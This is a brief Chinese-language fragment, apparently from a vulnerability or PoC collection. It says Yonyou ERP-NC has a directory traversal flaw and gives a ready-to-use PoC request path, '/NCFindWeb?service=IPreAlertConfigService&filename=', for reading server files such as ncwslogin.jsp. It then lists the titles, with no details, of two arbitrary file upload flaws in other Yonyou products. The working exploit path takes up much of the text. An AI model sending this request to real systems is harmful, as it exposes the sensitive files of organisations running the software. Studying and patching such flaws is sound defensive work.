用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
POC为
/NCFindWeb?service=IPreAlertConfigService&filename=
查看 ncwslogin.jsp 文件
用友 GRP-U8 UploadFileData 任意文件上传漏洞 用友 移动管理系统 uploadApk.do 任意文件上传漏洞